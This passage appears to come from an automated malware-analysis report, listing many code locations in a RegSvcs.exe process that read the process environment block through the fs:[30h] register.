Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4500 mov eax, dword ptr fs:[00000030h]	19_2_00FD4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]	19_2_00F7E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]	19_2_00F7E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]	19_2_00F7E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E6F2 mov eax, dword ptr fs:[00000030h]	19_2_00F7E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F806F1 mov eax, dword ptr fs:[00000030h]	19_2_00F806F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F806F1 mov eax, dword ptr fs:[00000030h]	19_2_00F806F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A6C7 mov ebx, dword ptr fs:[00000030h]	19_2_00F3A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A6C7 mov eax, dword ptr fs:[00000030h]	19_2_00F3A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F366B0 mov eax, dword ptr fs:[00000030h]	19_2_00F366B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C6A6 mov eax, dword ptr fs:[00000030h]	19_2_00F3C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04690 mov eax, dword ptr fs:[00000030h]	19_2_00F04690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04690 mov eax, dword ptr fs:[00000030h]	19_2_00F04690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F32674 mov eax, dword ptr fs:[00000030h]	19_2_00F32674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC866E mov eax, dword ptr fs:[00000030h]	19_2_00FC866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FC866E mov eax, dword ptr fs:[00000030h]	19_2_00FC866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A660 mov eax, dword ptr fs:[00000030h]	19_2_00F3A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A660 mov eax, dword ptr fs:[00000030h]	19_2_00F3A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1C640 mov eax, dword ptr fs:[00000030h]	19_2_00F1C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F36620 mov eax, dword ptr fs:[00000030h]	19_2_00F36620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F38620 mov eax, dword ptr fs:[00000030h]	19_2_00F38620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1E627 mov eax, dword ptr fs:[00000030h]	19_2_00F1E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0262C mov eax, dword ptr fs:[00000030h]	19_2_00F0262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42619 mov eax, dword ptr fs:[00000030h]	19_2_00F42619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F1260B mov eax, dword ptr fs:[00000030h]	19_2_00F1260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E609 mov eax, dword ptr fs:[00000030h]	19_2_00F7E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F047FB mov eax, dword ptr fs:[00000030h]	19_2_00F047FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F047FB mov eax, dword ptr fs:[00000030h]	19_2_00F047FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8E7E1 mov eax, dword ptr fs:[00000030h]	19_2_00F8E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]	19_2_00F227ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]	19_2_00F227ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F227ED mov eax, dword ptr fs:[00000030h]	19_2_00F227ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0C7C0 mov eax, dword ptr fs:[00000030h]	19_2_00F0C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F807C3 mov eax, dword ptr fs:[00000030h]	19_2_00F807C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FB47A0 mov eax, dword ptr fs:[00000030h]	19_2_00FB47A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F007AF mov eax, dword ptr fs:[00000030h]	19_2_00F007AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA678E mov eax, dword ptr fs:[00000030h]	19_2_00FA678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08770 mov eax, dword ptr fs:[00000030h]	19_2_00F08770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F10770 mov eax, dword ptr fs:[00000030h]	19_2_00F10770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00750 mov eax, dword ptr fs:[00000030h]	19_2_00F00750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42750 mov eax, dword ptr fs:[00000030h]	19_2_00F42750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F42750 mov eax, dword ptr fs:[00000030h]	19_2_00F42750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8E75D mov eax, dword ptr fs:[00000030h]	19_2_00F8E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F84755 mov eax, dword ptr fs:[00000030h]	19_2_00F84755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3674D mov esi, dword ptr fs:[00000030h]	19_2_00F3674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3674D mov eax, dword ptr fs:[00000030h]	19_2_00F3674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3674D mov eax, dword ptr fs:[00000030h]	19_2_00F3674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7C730 mov eax, dword ptr fs:[00000030h]	19_2_00F7C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3273C mov eax, dword ptr fs:[00000030h]	19_2_00F3273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3273C mov ecx, dword ptr fs:[00000030h]	19_2_00F3273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3273C mov eax, dword ptr fs:[00000030h]	19_2_00F3273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C720 mov eax, dword ptr fs:[00000030h]	19_2_00F3C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C720 mov eax, dword ptr fs:[00000030h]	19_2_00F3C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00710 mov eax, dword ptr fs:[00000030h]	19_2_00F00710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F30710 mov eax, dword ptr fs:[00000030h]	19_2_00F30710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C700 mov eax, dword ptr fs:[00000030h]	19_2_00F3C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C8F9 mov eax, dword ptr fs:[00000030h]	19_2_00F3C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3C8F9 mov eax, dword ptr fs:[00000030h]	19_2_00F3C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCA8E4 mov eax, dword ptr fs:[00000030h]	19_2_00FCA8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F2E8C0 mov eax, dword ptr fs:[00000030h]	19_2_00F2E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD08C0 mov eax, dword ptr fs:[00000030h]	19_2_00FD08C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8C89D mov eax, dword ptr fs:[00000030h]	19_2_00F8C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00887 mov eax, dword ptr fs:[00000030h]	19_2_00F00887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96870 mov eax, dword ptr fs:[00000030h]	19_2_00F96870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F96870 mov eax, dword ptr fs:[00000030h]	19_2_00F96870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8E872 mov eax, dword ptr fs:[00000030h]	19_2_00F8E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8E872 mov eax, dword ptr fs:[00000030h]	19_2_00F8E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F30854 mov eax, dword ptr fs:[00000030h]	19_2_00F30854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04859 mov eax, dword ptr fs:[00000030h]	19_2_00F04859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F04859 mov eax, dword ptr fs:[00000030h]	19_2_00F04859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F12840 mov ecx, dword ptr fs:[00000030h]	19_2_00F12840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA483A mov eax, dword ptr fs:[00000030h]	19_2_00FA483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA483A mov eax, dword ptr fs:[00000030h]	19_2_00FA483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3A830 mov eax, dword ptr fs:[00000030h]	19_2_00F3A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov ecx, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F22835 mov eax, dword ptr fs:[00000030h]	19_2_00F22835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8C810 mov eax, dword ptr fs:[00000030h]	19_2_00F8C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F329F9 mov eax, dword ptr fs:[00000030h]	19_2_00F329F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F329F9 mov eax, dword ptr fs:[00000030h]	19_2_00F329F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8E9E0 mov eax, dword ptr fs:[00000030h]	19_2_00F8E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0A9D0 mov eax, dword ptr fs:[00000030h]	19_2_00F0A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F349D0 mov eax, dword ptr fs:[00000030h]	19_2_00F349D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FCA9D3 mov eax, dword ptr fs:[00000030h]	19_2_00FCA9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F969C0 mov eax, dword ptr fs:[00000030h]	19_2_00F969C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F889B3 mov esi, dword ptr fs:[00000030h]	19_2_00F889B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F889B3 mov eax, dword ptr fs:[00000030h]	19_2_00F889B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F889B3 mov eax, dword ptr fs:[00000030h]	19_2_00F889B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F129A0 mov eax, dword ptr fs:[00000030h]	19_2_00F129A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F009AD mov eax, dword ptr fs:[00000030h]	19_2_00F009AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F009AD mov eax, dword ptr fs:[00000030h]	19_2_00F009AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA4978 mov eax, dword ptr fs:[00000030h]	19_2_00FA4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FA4978 mov eax, dword ptr fs:[00000030h]	19_2_00FA4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8C97C mov eax, dword ptr fs:[00000030h]	19_2_00F8C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]	19_2_00F26962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]	19_2_00F26962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F26962 mov eax, dword ptr fs:[00000030h]	19_2_00F26962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F4096E mov eax, dword ptr fs:[00000030h]	19_2_00F4096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F4096E mov edx, dword ptr fs:[00000030h]	19_2_00F4096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F4096E mov eax, dword ptr fs:[00000030h]	19_2_00F4096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4940 mov eax, dword ptr fs:[00000030h]	19_2_00FD4940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F80946 mov eax, dword ptr fs:[00000030h]	19_2_00F80946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8892A mov eax, dword ptr fs:[00000030h]	19_2_00F8892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F9892B mov eax, dword ptr fs:[00000030h]	19_2_00F9892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F8C912 mov eax, dword ptr fs:[00000030h]	19_2_00F8C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8918 mov eax, dword ptr fs:[00000030h]	19_2_00EF8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00EF8918 mov eax, dword ptr fs:[00000030h]	19_2_00EF8918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E908 mov eax, dword ptr fs:[00000030h]	19_2_00F7E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F7E908 mov eax, dword ptr fs:[00000030h]	19_2_00F7E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3AAEE mov eax, dword ptr fs:[00000030h]	19_2_00F3AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F3AAEE mov eax, dword ptr fs:[00000030h]	19_2_00F3AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F00AD0 mov eax, dword ptr fs:[00000030h]	19_2_00F00AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F34AD0 mov eax, dword ptr fs:[00000030h]	19_2_00F34AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F34AD0 mov eax, dword ptr fs:[00000030h]	19_2_00F34AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]	19_2_00F56ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]	19_2_00F56ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F56ACC mov eax, dword ptr fs:[00000030h]	19_2_00F56ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08AA0 mov eax, dword ptr fs:[00000030h]	19_2_00F08AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F08AA0 mov eax, dword ptr fs:[00000030h]	19_2_00F08AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F56AA4 mov eax, dword ptr fs:[00000030h]	19_2_00F56AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F38A90 mov edx, dword ptr fs:[00000030h]	19_2_00F38A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F0EA80 mov eax, dword ptr fs:[00000030h]	19_2_00F0EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00FD4A80 mov eax, dword ptr fs:[00000030h]	19_2_00FD4A80
